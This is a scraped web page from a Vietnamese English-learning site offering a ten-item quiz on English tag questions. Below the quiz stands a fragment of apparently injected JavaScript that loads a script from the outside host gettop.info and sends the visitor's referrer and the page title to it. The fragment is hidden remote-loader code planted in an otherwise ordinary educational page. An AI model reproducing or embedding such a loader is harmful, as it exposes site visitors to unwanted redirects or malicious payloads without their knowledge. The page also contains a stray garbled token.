Home / Trắc nghiệm ngữ pháp cơ bản / Test 21 – Trắc nghiệm ngữ pháp tiếng Anh cơ bản

Test 21 – Trắc nghiệm ngữ pháp tiếng Anh cơ bản

a2jDg

Các bài trắc nghiệm ngữ pháp tiếng Anh cơ bản này sẽ giúp các bạn kiểm tra được kiến thức ngữ pháp tiếng Anh cơ bản của mình. Từ đó, biết mình thiếu sót chỗ nào để bù đắp, trau dồi. Học ngữ pháp đơn thuần theo lý thuyết khá khô khan và khó nhớ, tienganh360.com có rất nhiều bài viết hướng dẫn các bạn học ngữ pháp một cách tốt nhất, các bạn tìm đọc nhé!


1.You’d rather I kept quiet about it, ……… ?
2.He used to work in the city, ……… ?
3.He has his lunch at the office, ……… ?
4.In that case he’ll have to look for a new job, ……… ?
5.You wouldn’t want me to do that, ……… ?
6.He really didn’t need to speak to me like that, ……… ?
7.Come back in the morning, ……… ?
8.You like milk in your tea, ……… ?
9.You are just the sort of person who would say that, ……… ?
10.You shouldn’t have done that, ……… ?


s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Cập nhật các bài viết của chúng tôi trên Facebook: